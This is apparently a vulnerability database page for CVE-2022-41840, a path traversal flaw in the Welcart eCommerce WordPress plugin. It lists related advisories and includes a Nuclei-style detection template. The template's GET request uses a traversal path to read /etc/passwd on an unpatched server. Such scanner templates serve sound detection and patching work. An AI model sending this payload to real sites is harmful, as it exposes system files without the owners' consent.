| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Exploit for Path Traversal in Welcart Welcart_E-Commerce | 19 Feb 202606:19 | – | githubexploit | |
| The vulnerability of the Welcart eCommerce plugin for the WordPress content management system allows a hacker to execute arbitrary code. | 21 Dec 202300:00 | – | bdu_fstec | |
| CVE-2022-41840 | 18 Nov 202222:29 | – | circl | |
| WordPress plugin Welcart eCommerce 路径遍历漏洞 | 18 Nov 202200:00 | – | cnnvd | |
| WordPress Welcart eCommerce directory traversal vulnerability | 23 Nov 202200:00 | – | cnvd | |
| CVE-2022-41840 | 18 Nov 202218:27 | – | cve | |
| CVE-2022-41840 WordPress Welcart eCommerce plugin <= 2.7.7 - Unauth. Directory Traversal vulnerability | 18 Nov 202218:27 | – | cvelist | |
| CVE-2022-41840 | 18 Nov 202219:15 | – | nvd | |
| WordPress Welcart eCommerce plugin <= 2.7.7 - Unauth. Directory Traversal vulnerability | 20 Oct 202200:00 | – | patchstack | |
| Directory traversal | 18 Nov 202219:15 | – | prion |
id: CVE-2022-41840
info:
name: Welcart eCommerce <=2.7.7 - Local File Inclusion
author: theamanrawat
severity: critical
description: |
Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion.
impact: |
The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
remediation: |
Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability.
reference:
- https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
- https://wordpress.org/plugins/usc-e-shop/
- https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2022-41840
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-41840
cwe-id: CWE-22
epss-score: 0.05116
epss-percentile: 0.91324
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: collne
product: welcart_e-commerce
framework: wordpress
tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022047ea6f6e9a5a3ab96eeaa45f263c4220309e10754cd1e155662c92fa8062cb8b022100c6e6f0214ab5d9653295ea74d58268b51b26278f53f454280a9652e019f130a3:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation